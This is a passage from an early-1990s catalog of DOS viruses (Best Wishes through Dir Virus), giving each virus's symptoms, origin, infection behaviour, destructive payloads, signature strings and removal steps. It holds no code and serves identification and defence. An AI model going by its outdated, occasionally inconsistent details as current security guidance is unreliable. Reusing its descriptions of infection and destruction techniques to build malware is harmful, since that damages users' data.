by the DOS ChkDsk command will decrease by 416 bytes. The interrupt 12 return is not moved. After the virus is memory resident, a clicking sound will be emitted by the system speaker each time a key is pressed on the keyboard. Some programs, such as the Edlin program supplied with MS-DOS, will receive an "Invalid drive or file name" message when they are attempted to be executed. Attention! will infect COM files, including COMMAND.COM, when they are executed. The exception is that very small COM files will not become infected. Infected files will increase in length by 394 bytes with the virus being located at the end of the file. Infected programs will also contain the text string: "ATTENTION !" near the beginning of the program. Virus Name: Best Wishes Aliases: Best Wish V Status: Rare Discovery: December, 1990 Symptoms: .COM file growth; decrease in system and available free memory; system hangs; file date/time changes; file not found errors; boot sector modification Origin: USSR Eff Length: 970 Bytes Type Code: PRtCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Best Wishes Virus was submitted in December, 1990 and is believed to be from the USSR. Best Wishes is a memory resident infector of COM files, including COMMAND.COM. There is a variant of this virus, Best Wishes B, which is 1,024 bytes in length. The first time a program infected with the Best Wishes Virus is executed, the virus will install itself memory resident in system high memory, but below the 640K DOS boundary. The interrupt 12 return will be moved. Total system memory will decrease by 61,440 bytes, available free memory will decrease by 61,360 bytes. COMMAND.COM will become infected at this time, and the disk's boot sector will also be modified. Disks with the boot sector modification and infected COMMAND.COM will still boot properly. After Best Wishes is resident, the virus will infect COM files as they are executed with a probability of 50%. Infected COM files will increase in length by 970 bytes with the virus being located at the end of the infected file. Infected programs will also have the following text string located near the end of the file: "This programm ... With Best Wishes!" Best Wishes does not restore the original file date and time in the directory when it infects programs, so all infected programs will have their date/time stamps set to the system date and time when infection occurred. Two additional symptoms of a Best Wishes infection are that the user may experience "File not found" errors when the file is actually on disk, as well as system hangs on every fourth program execution. Known variant(s) of Best Wishes are: Best Wishes B - An earlier version of Best Wishes, this variant is 1,024 bytes in length. The major differences are that infected disks will not boot if COMMAND.COM has been modified. Execution of a COM program once the virus is memory resident will result in the program most likely being infected, but the system will also become hung. Virus Name: Black Monday Aliases: V Status: Rare Discovery: September, 1990 Symptoms: .COM & .EXE file growth; TSR; file timestamp changes Origin: Kuala Lumpur, Malaysia Eff Length: 1,055 Bytes Type Code: PRsAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Pro-Scan 2.01+, Scan/D, or Delete infected files General Comments: The Black Monday Virus was isolated in Fiji in September, 1990. It is reported to be widespread in Fiji and other locations in the Far East and Asia. This virus is a memory resident generic infector of .COM and .EXE files, including COMMAND.COM. The first time a program infected with the Black Monday Virus is executed, the virus will install itself memory resident as a low system memory TSR of 2,048 bytes. Interrupt 21 will be hooked by the virus. Once the virus is memory resident, any program which is executed will become infected with the Black Monday Virus. .COM files will increase in length by 1,055 bytes with the virus's code located at the end of the infected files. .EXE files will also increase in length by 1,055 bytes with the virus's code added to the end of the file. This virus does not infect .EXE files multiple times. The virus does not hide the change in file length when the directory is displayed, though a directory display will indicated that the infected file's date/timestamp have been updated to the system date and time when the file was infected. The following text string can be found in all infected files near the beginning of the virus's code: "Black Monday 2/3/90 KV KL MAL" It is unknown when Black Monday activates, or what it does at activation. Virus Name: Blood Aliases: Blood2 V Status: Rare Discovery: August, 1990 Symptoms: .COM file length increase, system reboots and/or hangs, cascading screen effect Origin: Natal, Republic of South Africa Eff Length: 418 Bytes Type Code: PNCK - Parasitic Non-Resident .COM Infector Detection Method: Pro-Scan 2.0+ Removal Instructions: Delete infected files General Comments: The Blood Virus was submitted by Fridrik Skulason in August, 1990. It was originally isolated in Natal, Republic of South Africa. There are two variants of this virus, Blood and Blood2. This virus is a non-resident infector of .COM files, including COMMAND.COM. When a program infected with the Blood virus is executed, it will infect one .COM file located in the C: drive root directory. The newly infected file will have increased in length by 418 bytes. If the program just infected is COMMAND.COM, a system reboot will occur. Following the system reboot, executing an infected program will result in a cascading effect of the cursor down the screen. The next .COM file executed will then result in the hard disk being accessed followed by the system hanging. Spurious characters from memory may also appear on the screen on the line below the command line. After August 15, execution of an infected program will result in a system hang. Known variant(s) of Blood are: Blood2 : Similar to Blood, with the major difference being that system reboots, system hangs, and the cascading cursor effect no longer occur. This variant also does not hang the system after August 15. Virus Name: Bloody! Aliases: V Status: Rare Discovery: December, 1990 Symptoms: Extended boot time; decrease in system & available memory; message on boot; boot sector & partition table changes Origin: Taiwan Eff Length: N/A Type Code: BRtX - Resident Boot Sector & Partition Table Infector Detection Method: ViruScan V72+ Removal Instructions: See below General Comments: The Bloody! Virus was submitted in December 1990, and infection reports were received from Europe, Taiwan, and the United States. This virus is a memory resident infector of floppy diskette boot sectors as well as the hard disk partition table. When a system is booted from a floppy or hard disk infected with the Bloody! Virus, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. Total system memory and available free memory will decrease by 2,048 bytes. The interrupt 12 return will be moved. The system boot will also take much longer than expected. The system's hard disk's partition table will become infected immediately if it was not the source of the system boot. At the time of system boot, the virus also maintains a counter of how many times the infected diskette or hard drive has been booted. Once 128 boots have occurred, the virus will display the following message during the boot: "Bloody! Jun. 4, 1989" June 4, 1989 is the date of the the confrontation in Beijing, China between Chinese students and the Chinese Army in which many students were killed. This message will later be displayed on every sixth boot once the 128 boot limit has been reached. The text message is encrypted within the viral code, so it is not visible in the boot sector. Once Bloody! is memory resident, the virus will infect any diskette or hard disk when a file or program is accessed. Listing a disk directory will not be enough to cause the virus to infect the disk. Infected diskette boot sectors will be missing all of the normal DOS error messages which are normally found in the boot sector. The original boot sector will have been moved to sector 11 on 360K diskettes, a part of the root directory. If there were previously root directory entries in that sector, those files will be lost. On the hard disk, the original partition table will have been moved to side 0, cylinder 0, sector 6. For floppies of other sizes then 360K, they may become unusable or corrupted as the virus does not take into account the existence of these disk types. For diskettes, Bloody! can be removed by powering the system off and then booting from a known-clean, write protected original DOS diskette. The DOS SYS command should then be executed on each of the infected diskettes. To remove the Bloody! Virus from the hard disk's partition table, the original partition table should be located and then copied back to its original position. The other option is to backup the files on the hard disk and low level format the drive. Virus Name: Brain Aliases: Pakistani, Pakistani Brain V Status: Common Discovery: 1986 Symptoms: Extended boot time, Volume label change, Resident TOM, Three contiguous bad sectors (floppy only), BSC Origin: Pakistan Eff Length: N/A Type Code: BRt - Resident Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, CleanUp, F-Prot, Pro-Scan, or DOS SYS command General Comments: The Pakistani Brain virus originated in Lahore, Pakistan and infects disk boot sectors by moving the original contents of the boot sector to another location on the disk, marking those 3 clusters (6 sectors) bad in the FAT, and then writing the virus code in the disk boot sector. One sign of a disk having been infected, at least with the original virus, is that the volume label will be changed to "© Brain". Another sign is that the label "© Brain" can be found in sector 0 (the boot sector) on an infected disk. This virus does install itself resident on infected systems, taking up between 3K and 7K of RAM. The Brain virus is able to hide from detection by intercepting any interrupt that might interrogate the boot sector and redirecting the read to the original boot sector located elsewhere on the disk, thus some programs will be unable to see the virus. The original Brain virus only infected floppies, however variants to the virus can now infect hard disks. Also, some variants have had the "© Brain" label removed to make them harder to detect. Known variants of the Brain virus include: Brain-B/Hard Disk Brain/Houston Virus - hard disk version. Brain-C - Brain-B with the "© Brain" label removed. Clone Virus - Brain-C but restores original boot copyright label. Clone-B - Clone Virus modified to destroy the FAT after 5/5/92. Also see: Ashar Virus Name: Burger Aliases: 541, 909090h, CIA V Status: Extinct Discovery: 1986 Symptoms: Programs will not run after infection Origin: West Germany Eff Length: 560 Bytes Type Code: ONAK - Overwriting Non-Resident .COM & .EXE Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan /D, or delete infected files General Comments: The Burger, or 909090h, Virus was written and copyrighted in 1986 by Ralf Burger of West Germany. This virus is extinct in the "public domain". This virus is a non-resident overwriting virus, infecting .COM and .EXE files, including COMMAND.COM. When a program infected with the Burger Virus is executed, the virus will attempt to infect one previously uninfected .COM file located in the C: drive root directory. To determine if the program was previously infected, the virus checks to see if the first three bytes of the .COM file are three NOP instructions (909090h). If the first three bytes are the NOP instructions, the virus goes on checking until it finds an uninfected .COM file. If no uninfected .COM file exists, the virus then renames all the .EXE files in the root directory to .COM files and checks those files. Once it finds a .COM file to infect, it overwrites the first 560 bytes of the uninfected program with the virus code. At this point, the program the user was attempting to run will either end or hang the system. Infected programs will never execute properly as the first portion of the program has been destroyed. Systems which have been infected with the Burger Virus will fail to boot once the virus has infected the hard disk boot partition's COMMAND.COM, or the copy of COMMAND.COM on their boot diskette. Infected files can be easily identified by the "909090B8000026A245" hex sequence located in the first nine bytes of all infected files. Infected files cannot be disinfected, they must be replaced from a clean source. Known variant(s) of the Burger virus include: CIA : Discovered in the United States in October, 1990, this virus is similar to the Burger Virus described above. The first nine bytes of all infected files in hex will be: "909090B8000026A3A5". The actual length of this variant is 541 bytes, though the first 560 bytes of infected programs are overwritten. 505 : Similar to the Burger virus, this variant's actual code length is 505 bytes, though the first 560 bytes of infected files will be overwritten. Infected files will have their first nine bytes contain the hex string: "909090B8000026A3A0". 509 : Similar to the Burger virus, this variant's actual code length is 509 bytes, though the first 560 bytes of infected files will be overwritten. Infected files will have their first nine bytes contain the hex string: "909090B8000026A3A4". 541 : Similar to the Burger virus, this variant overwrites the first 560 bytes of infected programs, though the virus's length is actually 541 bytes. Infected programs will start with the hex sequence: "909090B8000026A3A4". Also see: VirDem Virus Name: Carioca Aliases: V Status: Rare Discovery: November, 1990 Symptoms: TSR; .COM growth Origin: Eff Length: 951 Bytes Type Code: PRsC - Parasitic Resident .COM Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete Infected Files General Comments: The Carioca Virus was submitted in November, 1990. This virus is a memory resident infector of .COM files, it does not infect COMMAND.COM. The first time a program infected with the Carioca Virus is executed, the virus will install itself memory resident as a 1,280 byte low system memory TSR. Interrupt 21 will be hooked by the virus. The system's available free memory will decrease by 1,312 bytes. After the virus is memory resident, any .COM file executed (with the exception of COMMAND.COM) will become infected with the Carioca Virus. Infected .COM files will show an increase in size of 951 bytes with the virus being located at the end of the infected file. Infected files will have the following hex character string located at the very end of the file: "2EFF1E1A010203CD21". It is unknown if Carioca contains any damage potential. Virus Name: Cascade Aliases: Fall, Falling Letters, 1701, 1704 V Status: Common Discovery: October, 1987 Symptoms: TSR, Falling letters, .COM file growth Origin: Germany Eff Length: 1,701 or 1,704 bytes Type Code: PRsC - Parasitic Resident Encrypting .COM Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, F-Prot, VirexPC, VirHunt 2.0+, Pro-Scan 2.01+ General Comments: Originally, this virus was a trojan horse which was disguised as a program which was supposed to turn off the number-lock light when the system was booted. The trojan horse instead caused all the characters on the screen to fall into a pile at the bottom of the screen. In late 1987, the trojan horse was changed by someone into a memory resident .COM virus. While the original virus had a length of 1,701 bytes and would infect both true IBM PCs and clones, a variation exists of this virus which is 3 bytes longer than the original virus and does not infect true IBM PCs. Both viruses are functionally identical in all other respects. Both of the viruses have some fairly unique qualities: Both use an encryption algorithm to avoid detection and complicate any attempted analysis of them. The activation mechanisms are based on a sophisticated randomization algorithm incorporating machine checks, monitor types, presence or absence of a clock card, and the time or season of the year. The viruses will activate on any machine with a CGA or VGA monitor in the months of September, October, November, or December in the years 1980 and 1988. Known variants of the Cascade virus are: 1701-B : Same as 1701, except that it can activate in the fall of any year. 1704-D : Same as the 1704, except that the IBM selection has been disabled so that it can infect true IBM PCs. 17Y4 : Similar to the Cascade 1704 virus, the only difference is one byte in the virus which has been altered. Cunning: Based on the Cascade virus, a major change to the virus is that it now plays music. Also see: 1704 Format Virus Name: Cascade-B Aliases: Blackjack, 1704-B V Status: Common Discovery: Symptoms: .COM file growth, TSR, random reboots Origin: Germany Eff Length: 1,704 bytes Type Code: PRsC - Parasitic Resident Encrypting .COM Infector Detection Method: ViruScan, F-Prot, IBM Scan, VirexPC, AVTK 3.5+, Pro-Scan, VirHunt 2.0+ Removal Instructions: CleanUp, F-Prot, VirexPC, VirHunt 2.0+ General Comments: The Cascade-B virus is similar to the Cascade virus, except that the cascading display has been replaced with a system reboot which will occur at random time intervals after the virus activates. Other variation(s) which have been documented are: 1704-C : Same as 1704-B except that the virus can activate in December of any year. Virus Name: Casper Aliases: V Status: Rare Discovery: August, 1990 Symptoms: .COM file growth, April 1st disk corruption (see below) Origin: Eff Length: 1,200 bytes Type Code: PNCK - Parasitic Non-Resident Encrypting .COM Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Casper Virus was isolated in August, 1990 by Fridrik Skulason of Iceland. The origin of this virus is unknown at this time. Casper is a non-resident generic infector of .COM files, including COMMAND.COM. When a program infected with the Casper Virus is executed, the virus will attempt to infect one .COM program located in the current drive and directory. Infected files will increase in length by 1,200 bytes, with the virus's code being located at the end of the .COM file. The Casper Virus contains the following message, though this message cannot be seen in infected program as Casper uses a complex self- encryption mechanism: "Hi! I'm Casper The Virus, And On April 1st I'm Gonna Fuck Up Your Hard Disk REAL BAD! In Fact It Might Just Be Impossible To Recover! How's That Grab Ya! <GRIN>" On April 1st, when an infected program is executed, this virus will overwrite the first track of the drive where the infected program was executed from. Later attempts to access the drive will result in "Sector not found" errors occurring. The Casper Virus is based on the Vienna virus. Unlike Vienna, it is self-encrypting. The self-encryption mechanism employed is similar to the encryption mechanism used in the V2P6 virus, and requires an algorithmic approach in order to identify it as there are not any identifying strings located in the encrypted virus. Virus Name: Chaos Aliases: V Status: Rare Discovery: December, 1989 Symptoms: Message, TSR, Bad sectors, BSC Origin: England Eff Length: N/A Type Code: BR - Resident Boot Sector Infector Detection Method: ViruScan V53+ Removal Instructions: MDisk, CleanUp, or DOS SYS Command General Comments: First reported in December, 1989 by James Berry of Kent, England, the Chaos virus is a memory resident boot sector infector of floppy and hard disks. When the Chaos virus infects a boot sector, it overwrites the original boot sector without copying it to another location on the disk. Infected boot sectors will contain the following messages: "Welcome to the New Dungeon" "Chaos" "Letz be cool guys" The Chaos virus will flag the disk as being full of bad sectors upon activation, though most of the supposed bad sectors are still readable. It is unknown what the activation criteria is. Virus Name: Christmas In Japan Aliases: Xmas In Japan V Status: Rare Discovery: September, 1990 Symptoms: .COM file growth; Message Origin: Taiwan Eff Length: 600 Bytes Type Code: PNCK - Resident Non-Resident .COM Infector Detection Method: ViruScan V67+, Pro-Scan 2.01+ Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files General Comments: The Christmas In Japan Virus was isolated in Taiwan in late September, 1990. As of early October, it is reported to be widespread in Japan. This virus is a 600 byte non-resident generic infector of .COM files. It will infect COMMAND.COM. When a program infected with the Christmas In Japan Virus is executed, the virus will infect zero to one other .COM file in the current directory. If a file is infected, it will increase in length by 600 bytes, with the virus being located at the end of the infected file. On December 25, if an infected file is executed, the following message will be displayed in the center of the screen: "A merry christmas to you" The message will flash and will be underlined for approximately half the time it is displayed. If left alone, the message will go away after a little while and the program will execute normally, but the message will return when another infected .COM file is executed. This virus does not appear to do any malicious damage. Virus Name: Christmas Virus Aliases: Tannenbaum, XA1, 1539 V Status: Endangered Discovery: March, 1990 Symptoms: .COM file growth, display, Partition table destruction Origin: Germany Eff Length: 1,539 Bytes Type Code: PNCX - Parasitic Non-Resident .COM Infector Detection Method: ViruScan V61+, VirexPC, VirHunt 2.0+, Pro-Scan 2.01+ Removal Instructions: Scan/D, VirHunt 2.0+, Pro-Scan 2.01+, or delete infected files General Comments: The Christmas Tree, or XA1, Virus was first isolated in March 1990 by Christoff Fischer of West Germany. This virus is an encrypting virus which will only infect .COM files. On April 1st of any year, the Christmas Tree virus will activate, destroying the partition table of infected hard disks the first time an infected program is executed. During the period from December 24 until January 1st of any year, when an infected program is executed, the virus will display a full screen picture of a christmas tree. Virus Name: Cookie Aliases: V Status: New Discovery: January, 1991 Symptoms: .COM & .EXE growth; system hangs Origin: Unknown/Europe Eff Length: 2,232 bytes Type Code: PNAK - Parasitic Non-Resident .COM & .EXE Infector Detection Method: ViruScan, F-Prot, VirexPC Removal Instructions: Scan/D, or Delete infected files General Comments: The Cookie Virus was received in January, 1991, it is believed to have originated in Europe. This virus is based on the SysLock Virus, though it is considerably shorted in length. Some anti-viral utilities will identify this virus as SysLock, though it is listed here separately due to its differences in characteristics. It is a non-resident direct action virus which infects .COM and .EXE files, including COMMAND.COM. When a program infected with the Cookie Virus is executed, the virus will search the current drive and directory for a file to infect. The virus first looks for a .COM file to infect. If an uninfected .COM file is located, it will become infected. If an uninfected .COM file is not found, the virus will then look for an uninfected .EXE file to infect. In other words, all the .COM files in the directory will become infected before any of the .EXE files in that directory are infected. Infected files will show a file length increase of between 2,232 and 2,251 bytes in length. The virus will be located at the end of the infected file. Infected files will not have their date and time in the disk directory altered. Systems infected with the Cookie Virus may experience system hangs when some infected programs are executed. In some cases, the infected program will stop functioning properly after a number of executions, though this does not always occur. This virus has also been reported to possibly display the message "I want a COOKIE!", though the sample received doesn't exhibit this behavior. Also see: SysLock Virus Name: Dark Avenger Aliases: Black Avenger, Eddie, Diana V Status: Common Discovery: September, 1989 Symptoms: TSR; .COM, .EXE, .SYS file growth; File/Disk Corruption Origin: Bulgaria Isolated: Davis, California, USA Eff Length: 1,800 bytes Type Code: PRsAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V36+, F-Prot, IBM Scan, Pro-Scan, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: CleanUp, Pro-Scan 1.4+, F-Prot, VirHunt 2.0+ General Comments: Dark Avenger was first isolated in the United States at the University of California at Davis. It infects .COM, .EXE, and overlay files, including COMMAND.COM. The virus will install itself into system memory, becoming resident, and is extremely prolific at infecting any executable files that are openned for any reason. This includes using the DOS COPY and XCOPY commands to copy uninfected files, both the source and the target files will end up being infected. Infected files will have their lengths increased by 1,800 bytes. The Dark Avenger Virus does perform malicious damage. The virus maintains a counter in the disk's boot sector. After each sixteenth file is infected, the virus will randomly overwrite a sector on the disk with a copy of the disk's boot sector. If the randomly selected sector is a portion of a program or data file, the program or data file will be corrupted. Programs and data files which have been corrupted by a sector being overwritten are permanently damaged and cannot be repaired since the original sector is lost. If you are infected with Dark Avenger, shutdown your computer and reboot from a Write Protected boot diskette for the system, then carefully use a disinfector, following all instructions. Be sure to re-scan the system for infection once you have finished disinfecting it. The Dark Avenger virus contains the words: "The Dark Avenger, copyright 1988, 1989", as well as the message: "This program was written in the city of Sofia. Eddie lives.... Somewhere in Time!". This virus bears no resemblance or similarity to the Jerusalem viruses, even though they are similar in size. Known variant(s) of Dark Avenger are: Dark Avenger-B : Very similar to the Dark Avenger virus, the major difference is that .COM files will be reinfected, adding 1,800 bytes to the file length with each infection. This variant also becomes memory resident in high system memory instead of being a low system memory TSR. Text strings found in the virus's code include: "Eddie lives...somewhere in time!" "Diana P." "This program was written in the city of Sofia" "(C)1988-1989 Dark Avenger" Also see: V2000, V1024, V651 Virus Name: Datacrime Aliases: 1168, Columbus Day V Status: Extinct Discovery: April, 1989 Symptoms: .COM file growth, floppy disk access; formats hard disk, message any day from Oct 13 to Dec 31. Origin: Holland Eff Length: 1,168 bytes Type Code: PNC - Parasitic Non-Resident .COM Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: AntiCrim, Scan/D/X, Pro-Scan 1.4+, VirexPC, F-Prot, VirHunt 2.0+ General Comments: The Datacrime virus is a parasitic virus, and is also known as the 1168 virus. The Datacrime virus is a non-resident virus, infecting .COM files. The virus was originally discovered in Europe shortly after its release in March, 1989. The virus will attach itself to the end of a .COM file, increasing the file's length by 1168 bytes. The first 5 bytes of the host program are stored off in the virus's code and then replaced by a branch instruction so that the virus code will be executed before the host program. In order to propagate, the virus searches thru directories for .COM files, other than COMMAND.COM and attaches to any found .COM files (except for where the 7th letter is a D). Hard drive partitions are searched before the floppy drives are checked. The virus will continue to propagate until the date is after October 12 of any year, then when it is executed it will display a message. The decrypted message is something like: "DATACRIME VIRUS" "RELEASED: 1 MARCH 1989". Note: only this ASCII message is encrypted in this version. A low-level format of the hard disk is then done. Errors in the code will make .COM file infection appear random and will often make the system crash following infection. Unlike the other variants of Datacrime, the original Datacrime virus does not replicate, or infect files, until after April 1 of any year. Lastly, if the computer system is using an RLL, SCSI, or PC/AT type hard disk controller, all variants of the Datacrime virus are not able to successfully format the hard disk, according to Jan Terpstra of the Netherlands. Also see: Datacrime II, Datacrime IIB, Datacrime-B Virus Name: Datacrime II Aliases: 1514, Columbus Day V Status: Endangered Discovered: September, 1989 Symptoms: .EXE & .COM file growth, formats disk Origin: Netherlands Eff Length: 1,514 bytes Type Code: PNAK - Non-Resident Encrypting .COM & .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: AntiCrim, Scan/D/X, Pro-Scan 1.4+, VirexPC, F-Prot, VirHunt 2.0+ General Comments: The Datacrime II virus is a variant of the Datacrime virus, the major characteristic changes are that the effective length of the virus is 1,514 bytes, and that it can now infect both .COM and .EXE files, including COMMAND.COM. There is also an encryption mechanism in the Datacrime II virus. The Datacrime II virus will not format disks on Mondays. Also see: Datacrime, Datacrime IIB, Datacrime-B Virus Name: Datacrime IIB Aliases: 1917, Columbus Day V Status: Endangered Discovered: November, 1989 Symptoms: .EXE & .COM growth, formats disk, floppy disk access. Origin: Netherlands Eff Length: 1,917 bytes Type Code: PNAK - Non-Resident Encrypting .COM & .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, VirHunt 2.0+ Removal Instructions: AntiCrim, Scan/D/X, F-Prot, VirexPC, VirHunt 2.0 General Comments: The Datacrime IIB virus is a variant of the Datacrime II virus, and was isolated by Jan Terpstra of the Netherlands in November, 1989. This virus, as with Datacrime II, infects generic .COM & .EXE files, including COMMAND.COM, adding 1,917 bytes to the file length. The virus differs from Datacrime II in that the encryption method used by the virus to avoid detection has been changed. The Datacrime IIB virus will not format disks on Mondays. Also see: Datacrime, Datacrime II, Datacrime-B Virus Name: Datacrime-B Aliases: 1280, Columbus Day V Status: Extinct Discovered: April, 1989 Symptoms: .EXE file growth, formats MFM/RLL hard drives, odd floppy disk access. Origin: Netherlands Eff Length: 1,280 bytes Type Code: PNE - Parasitic Non-Resident Generic .EXE Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: AntiCrim, Scan/D/X, VirexPC, Pro-Scan 1.4+, F-Prot, VirHunt 2.0 General Comments: The Datacrime-B virus is a variant of the Datacrime virus, the differences being that the effective length of the virus is 1,280 bytes, and instead of infecting .COM files, .EXE files are infected. Also see: Datacrime, Datacrime II, Datacrime II-B Virus Name: DataLock Aliases: DataLock 1.00, V920 V Status: Common Discovered: November, 1990 Symptoms: .EXE & COMMAND.COM file growth; decrease in system and available memory; file date/time changes Origin: USA Eff Length: 920 bytes Type Code: PRtEK - Parasitic Resident .EXE and COMMAND.COM Infector Detection Method: ViruScan V71+, Pro-Scan 2.01+ Removal Instructions: Clean-Up V71+, or Delete infected files General Comments: The DataLock, or V920, Virus was isolated in many locations in the United States starting on November 1, 1990. This virus is a generic memory resident infector of .EXE files, but it will also infect COMMAND.COM if it is executed. The first time a program infected with the DataLock Virus is executed, the virus will install itself memory resident at the top of free memory, but below the 640K DOS boundary. Infected systems will find that total system memory and available free memory will be 2,048 bytes less than is expected. Interrupt 21 will be hooked by the virus. After the virus is memory resident, any .EXE file that is executed will be infected by the virus. Infected files will have a file length increase of 920 bytes, and their date/time indicated in the disk directory will have been changed to the system date and time when the infection occurred. The virus is located at the end of infected files. The following text, indicating the virus's name, can be found at the end of all infected files: "DataLock version 1.00" It is unknown if DataLock carries an activation date, or its potential for damage. Virus Name: dBASE Aliases: DBF Virus V Status: Extinct Discovered: September, 1988 Symptoms: .COM & .OVL file growth, corrupt .DBF files, TSR, FAT and root directory overwritten Origin: New York, USA Eff Length: 1,864 bytes Type Code: PRC - Parasitic Resident .COM and Overlay Infector Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D/X, Pro-Scan 1.4+, F-Prot, VirHunt 2.0+ General Comments: The dBASE virus was discovered by Ross Greenberg of New York. This virus infects .COM & .OVL files, and will corrupt data in .DBF files by randomly transposing bytes in any open .DBF file. It keeps track of which files and bytes were transposed in a hidden file (BUG.DAT) in the same directory as the .DBF file(s). The virus restores these bytes if the file is read, so it appears that nothing is wrong. Once the BUG.DAT file is 90 days old or more, the virus will overwrite the FAT and root directory on the disk. After this virus has been detected, if you remove the infected dBASE program and replace it with a clean copy, your DBF files that were openned during the period that you were infected will be useless since they are garbled on the disk even though they would be displayed as expected by the infected dBASE program. Virus Name: Den Zuk Aliases: Search, Venezuelan V Status: Common Discovered: September, 1988 Symptoms: Message, floppy format, TSR, BSC Origin: Indonesia Eff Length: N/A Type Code: RtF - Resident Floppy Boot Sector Infector Detection Method: ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: MDisk, CleanUp, F-Prot, Pro-Scan 1.4+, or DOS SYS command General Comments: The Den Zuk virus is a memory-resident, boot sector infector of 360K 5 1/4" diskettes. The virus can infect any diskette in a floppy drive that is accessed, even if the diskette is not bootable. If an attempt is made to boot the system with an infected non-system disk, Den Zuk will install itself into memory even though the boot failed. After the system is booted with an infected diskette, a purple "DEN ZUK" graphic will appear after a CTL-ALT-DEL is performed if the system has a CGA, EGA, or VGA monitor. While the original Den Zuk virus did not cause any damage to the system, some variants maintain a counter of how many times the system has been rebooted, and after the counter reaches its limit, the floppy in the disk drive is reformatted. The counter in these variants of the virus is usually in the range of 5 to 10. The following text strings can be found in the viral code on diskettes which have been infected with the Den Zuk virus: "Welcome to the C l u b --The HackerS-- Hackin' All The Time The HackerS" The diskette volume label of infected diskettes may be changed to Y.C.1.E.R.P., though this change only occurs if the Den Zuk virus removed a Pakistani Brain infection before infecting the diskette with Den Zuk. The Den Zuk virus will also remove an Ohio virus infection before infecting the diskette with Den Zuk. The Den Zuk virus is thought to be written by the same person or persons as the Ohio virus. The "Y.C.1.E.R.P." string is found in the Ohio virus, and the viral code is similar in many respects. Also see: Ohio Virus Name: Destructor V4.00 Aliases: Destructor V Status: New Discovered: December, 1990 Symptoms: .COM & .EXE growth; decrease in system and available free memory Origin: Bulgaria Eff Length: 1,150 Bytes Type Code: PRtAK - Parasitic Resident .COM & .EXE Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Destructor V4.00 Virus was received in December, 1990. This virus is from Bulgaria, and is a memory resident infector of .COM and .EXE files, including COMMAND.COM. When the first program infected with the Destructor V4.00 Virus is executed, the virus will install itself memory resident at the top of system memory but below the 640K DOS boundary. Interrupt 12's return is moved. Total system memory and available free memory will be 1,216 bytes less than what is expected on the infected system. At this time, the virus will also infect COMMAND.COM if it is not already infected. Once Destructor V4.00 is memory resident, it will infect programs as they are openned or executed. Infected .COM programs will have increased in size by 1,150 bytes. .EXE programs will have increased in size by 1,154 to 1,162 bytes. In both cases, the virus will be located at the end of the infected file. This virus does not alter the file's date/time in the disk directory, and it also makes no attempt to hide the file length increase on infected programs. The following text string can be found in files infected with this virus: "DESTRUCTOR V4.00 © 1990 by ATA It is unknown what Destructor V4.00 does, if anything, besides replicate. Virus Name: Devil's Dance Aliases: Mexican V Status: Rare Discovered: December, 1989 Symptoms: Message, .COM growth, FAT corruption, TSR Origin: Mexico Eff Length: 941 Bytes Type Code: PRCT - Parasitic Resident .COM Infector Detection Method: ViruScan V52+, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+, VirHunt 2.0+ Removal Instructions: Scan/D, Pro-Scan 1.4+, VirHunt 2.0+, or delete infected files General Comments: The Devil's Dance virus was first isolated in December, 1989, by Mao Fragoso of Mexico City. The Devil's Dance virus increases the size of infected .COM files by 941 bytes, and will infect a file multiple times until the file becomes too large to fit in available system memory. Once an infected program has been run, any subsequent warm- reboot (CTL-ALT-DEL) will result in the following message being displayed: "DID YOU EVER DANCE WITH THE DEVIL IN THE WEAK MOONLIGHT? PRAY FOR YOUR DISKS!! The Joker" The Devil's Dance virus is destructive. After the first 2,000 keystrokes, the virus starts changing the colors of any text displayed on the system monitor. After the first 5,000 keystrokes, the virus erases the first copy of the FAT. At this point, when the system is rebooted, it will display the message above and again destroy the first copy of the FAT, then allow the boot to proceed. Virus Name: Dir Virus Aliases: V Status: New Discovered: January, 1991 Symptoms: .COM growth; TSR; Sluggishness of DIR commands; File allocation errors Origin: USSR Eff Length: 691 Bytes Type Code: PRsCK - Parasitic Resident .COM Infector Detection Method: ViruScan V74+ Removal Instructions: Scan/D, or Delete infected files General Comments: The Dir Virus was submitted in January, 1991. It originated in the USSR. The Dir Virus is a memory resident infector of .COM programs, including COMMAND.COM. The first time a program infected with the Dir Virus is executed, the virus will install itself memory resident as a low system memory TSR of 1,008 bytes. Interrupt 21 will be hooked by the virus. If COMMAND.COM is not already infected, it will become infected at this time. After the Dir Virus is memory resident, it will only infect .COM programs when a DOS Dir command is performed. It does not infect programs on execution, or when .COM files are openned. When a Dir command is performed, the first uninfected .COM program that is found in the directory will become infected. When the virus infects a .COM file, there will be a pause in the output of the dir command while the program is being infected, then the output will continue. Infected programs will increase in size by 691 bytes, though the file length increase cannot be seen when a directory command is performed if the virus is memory resident. The 